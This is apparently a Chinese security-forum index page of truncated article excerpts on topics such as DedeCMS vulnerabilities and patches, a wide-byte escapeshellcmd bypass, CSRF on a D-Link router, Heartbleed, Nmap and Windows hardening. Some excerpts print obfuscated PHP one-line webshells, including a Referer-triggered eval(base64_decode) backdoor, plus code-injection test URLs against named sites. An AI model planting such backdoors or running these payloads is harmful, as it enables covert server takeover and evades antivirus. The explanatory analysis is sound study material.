电脑病毒论坛 今日: 0|主題: 1421|排名: 14 

事情是这样的，朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到，小黑的伎俩很高级，每次使用完毕总是把后门删掉，但是每次都能继续进来，总是找不到从哪进来的。这个着实让人蛋疼。 后来，终于在日志中发现一丝蛛丝马迹，通过我的分析，我发现一个IP总是很奇怪的POST数据到某个文件。然后一段时间 ...

dedecms广告内容没有做限制,可以输入脚本信息，并写入文件，导致木马植入！ 此补丁，是防止广告里带PHP脚本并写入文件！ 核心代码：ad_js.php 复制代码代码如下: //禁止写入和PHP脚本有关字符信息 //========================================================================== if ((strripos($adbody,"<?")>=0) ...

如果小结中有理解错误的地方，麻烦大家提出。漏洞本质： php 使用 php_escape_shell_cmd这个函数来转义命令行字符串时是作为单字节处理的而当操作系统设置了GBK、EUC-KR、SJIS等宽字节字符集时候，将 ...如果小结中有理解错误的地方，麻烦大家提出。 漏洞本质：php 使用 php_escape_shell_cmd这个函数来转义命令行字符 ...

电脑，软件DiskGenius下载地址：https://www.jb51.net/softs/19980.html 1、打开DiskGenius软件，左面找到你的U盘，选定它。 2、单击上方的‘硬盘’选项。 3、选择其中的‘重建主引导记录’。 4、选择其中的‘清除保留扇区’。 完毕！！！！ END 记得要备份数据，一定要！！ ...

Ø  安全十五招 1.经常更改系统管理员密码。---->且密码最好是大小写都有 2.定期更新系统补丁。---->开启自动更新，并设定到晚上重启。3.检查系统是否多出超级管理员，检查是否有帐号被克隆在“开始”>运行中输入“cmd”>在输入 net localgroup administrators4.在“开始”>运行 ...

玩也玩够了，有点鸡肋，会提示此模板没安装等情况..有人发出来了 那老衲也发吧 谷歌批量还需改进 一会儿会补上！ 原文： http://www.wooyun.org/bug.php?action=view&id=2984 测试如下： http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()} 测试结果： http://www.cnqiyou.com/yp/product.php?pagesize=${@phpin ...

会员上传文件漏洞，可以上传任意后缀 user/swfupload.asp文件漏洞复制代码代码如下:If UpFileObj.Form("NoReName")="1" Then '不更名 Dim PhysicalPath,FsoObj:Set FsoObj = KS.InitialObject(KS.Setting(99)) PhysicalPath = Server.MapPath(replace(TempFileStr,"|","")) TempFileStr= mid(TempFileStr,1, InStrRev(TempF ...

360scan正则：INSERT\\s+INTO.+?VALUES 其实Mysql不只可以用insert into xxx values 插入数据，还可以:insert into xxx set xx = 提交： http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123456') 提交set语法： http://localhost/360.php?sql=insert into user set user='admin',pass='1234 ...

A、公共场所免费的WiFi是元凶，假WiFi15分钟可盗取信息 据介绍，这种骗术的成本并不高，一台WIN7系统电脑、一套无线网络及一个网络包分析软件，设置一个无线热点AP，就可以轻松地搭建一个不设密码的WiFi。 现如今公共场所免费WiFi铺天盖地，很难分辨哪个账号是不法分子搭建的。如果不慎使用，不法分子只需15分钟就可窃取手 ...

1，介绍 本文的目的是展示CSRF漏洞的危害，以D-link的DIR-600路由器（硬件版本：BX，固件版本：2.16）的CSRF漏洞为例。D-link的CSRF漏洞已经是公开的，本文将详细描述一下整个D-link CSRF漏洞的利用，如何通过CSRF漏洞实现远程管理访问D-link路由器。 2，CSRF漏洞说明 如果某些request请求中没有csrf  token或不需要密 ...

　　小编带来了心脏出血漏洞检测软件下载地址，大家可以下载心脏出血漏洞一键检测app，为了我们账户的安全，大家都可以检测一下自己的手机是否存在心脏出血漏洞哦~    　　尽管“心脏出血”是一个网络漏洞，但是某些手机App通过HTTP或HTTPS来访问服务器并使用OpenSSL，也由此带来了风险。手机用户面 ...

　　小编带来了openssl安全漏洞介绍，想知道openssl心脏出血漏洞防治方法是什么吗?近日，openssl心脏出血漏洞被曝光，该漏洞影响范围甚广，大家可以通过下文了解详细信息。    　　--什么是SSL? 　　SSL是一种流行的加密技术，可以保护用户通过互联网传输的隐私信息。当用户访问Gmail.com等安全网站时，就会在U ...

　　小编带来了openssl漏洞详情，想知道openssl重大安全漏洞具体是什么情况吗?会不会威胁到我们的财产安全呢?下文将会为大家详细介绍，网友们可以来了解一下。  　　昨日，OpenSSL(为网络通信提供安全及数据完整性的一种安全协议)爆出本年度最严重的安全漏洞。利用该漏洞，黑客坐在自己家里电脑前，就可以实时获取到很 ...

复制代码代码如下:<?php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");${'_'.$_}['_'](${'_'.$_}['__']);?> 以上是网上流传的一段由纯符号组成的一句话后门代码，这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。 第一行：$_="";定义一个以下划线作为命名的字 ...

本地测试结果如下图。 本程序只作为学习作用，请勿拿去做坏事。 复制代码代码如下: <?php //1.php header('Content-type:text/html;charset=utf-8'); parse_str($_SERVER['HTTP_REFERER'], $a); if(reset($a) == '10' && count($a) == 9) { eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6))))); }<?p ...

Nmap是一款非常强大的实用工具,可用于： 检测活在网络上的主机（主机发现）检测主机上开放的端口（端口发现或枚举）检测到相应的端口（服务发现）的软件和版本检测操作系统，硬件地址，以及软件版本检测脆弱性的漏洞（Nmap的脚本）Nmap是一个非常普遍的工具，它有命令行界面和图形用户界面。本人包括以下方面的内容:&n ...

中断INT 21H :1、字符功能调用类(Character-Oriented Function)01H、07H和08H —从标准输入设备输入字符02H —字符输出03H —辅助设备的输入04H —辅助设备的输出05H —打印输出06H —控制台输入/输出09H —显示字符串0AH — 键盘缓冲输入0BH —检测输入状态0CH —清输 ...

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名，是国内最知名的PHP开源网站管理系统，也是使用用户最多的PHP类CMS系统。 近日，网友在dedecms中发现了全版本通杀的SQL注入漏洞，目前官方最新版已修复该漏洞，相关利用代码如下： EXP: 复制代码代码如下: http://*.*.com/p ...

　　电子邮件又称电子信箱、电子邮政，它是—种用电子手段提供信息交换的通信方式，是Internet应用最广的服务，通过网络的电子邮件系统，用户可以用非常低廉的价格(不管发送到哪里，都只需负担电话费和网费即可)，以非常快速的方式(几秒钟之内可以发送到世界上任何你指定的目的地)，与世界上任何一个角落的网络用户联 ...

网友们在电脑遇到病毒时，肯定是要杀毒的，但是使用杀毒的方法都是用一般的操作，比如杀毒软件、打开进程管理器关闭不熟悉的进程等。这样的杀毒方式好似太过于单一啦!所以今天小编就为网友们了解一种神奇的杀毒方法，那就是记事本杀毒。到底是怎么回事呢?一起去看看吧! 第一步：在“开始→运行”中输入CMD， ...